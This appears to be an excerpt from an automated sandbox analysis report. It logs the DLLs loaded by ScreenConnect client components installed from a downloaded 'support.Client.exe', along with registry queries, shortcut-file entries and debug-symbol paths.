              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: dfshim.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: dpapi.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: winsta.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: netapi32.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: samcli.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: samlib.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: mswsock.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: dnsapi.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: winnsi.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: winsta.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dll
              Source: C:\Users\user\Downloads\support.Client.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
              Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.14.dr, ScreenConnect.WindowsFileManager.exe.14.dr
              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Misc\Bootstrapper\Release\ClickOnceRunner.pdb source: support.Client.exe, 0000000D.00000000.1408916929.000000000025B000.00000002.00000001.01000000.00000006.sdmp, Unconfirmed 974768.crdownload.0.dr, chromecache_128.1.dr
